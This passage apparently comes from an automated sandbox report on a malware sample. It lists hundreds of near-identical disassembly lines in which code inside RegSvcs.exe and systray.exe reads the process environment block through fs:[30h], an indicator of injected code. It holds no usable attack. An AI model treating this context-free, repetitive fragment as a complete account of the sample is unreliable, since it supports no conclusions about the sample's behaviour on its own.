            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013314FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01348CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01274F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01274F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129B73D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129B73D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01348F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01288794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0132FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01287E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01287E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01287E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01287E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01287E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01287E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01340EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01340EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01340EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012876E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01348ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0132FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05038D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0502E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05013D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F7849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05022D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05022D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05022D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05022D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05022D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05022D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05022D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FFC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FFC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_050305AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_050305AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0502FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0502FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0502FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0502FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05018DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0503740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0503740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0503740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F7D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F7D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F91DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F91DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F91DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F935A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F87D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F94D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F94D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F94D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F6AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FEA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05038CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_050214FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0503070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0503070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F776E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F916E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F936CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05038F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FFFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F7766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F77E41 mov eax, dword ptr fs:[00000030h]
